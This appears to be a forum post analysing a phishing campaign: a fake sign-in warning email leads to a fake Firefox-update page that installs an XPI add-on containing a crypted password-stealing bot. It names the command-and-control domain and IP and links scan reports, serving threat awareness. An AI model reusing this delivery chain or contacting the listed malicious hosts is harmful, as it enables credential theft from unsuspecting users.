I got a mail same as other members as you can see
here it looks like a simple phishing mail with title "Suspicious sign in prevented" but it's more than that.
Email is probably being sent via a php mailer from a hacked server (wohnmobileunited.de)
If you move your mouse on button you will see a shortlink, I copied that link and it redirected me to phishing cum landing page that gives warning about outdated firefox and tries to install a xpi file by running it
XPI file is hosted on dropbox.
Now I tried to download that addon, renamed .xpi to .zip and exported it's content.
Voila.. There's a exe in it, which is a custom bot cum password stealer that downloads more files on your pc automatically.
But how it's getting executed? Answer is in javascript file.
It connects to a domain and some servers.
zuzuri.x64.me 79.172.242.88
X64.me is a free dns domain
https://www.dnsdynamic.org Virus scan report. (Most antiviruses are unable to detect as it's Crypted.
https://www.virustotal.com/en/file/02293d8b45e69f4dc0d69eb85553c5b6f97c47789689bc03bc0af729f4b25e0d/analysis/1396215000/You can see full analysis here.
https://malwr.com/analysis/MjZhN2ExYzQ2MzBmNGI5ZDhiNjExNzM4NTQ1MGM1YjA/Now when you try to find more info about that zazuri.x64.me domain, you will get scan links of other malwares that includes .scr file and a pdf (pdf exploit)
ttps://malwr.com/analysis/MDIyZGFkNGNmMGM4NGFhZmFjMGM1OTdiMTY3YmJkNGM/
http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~AutoIt-AGU/detailed-analysis.aspx
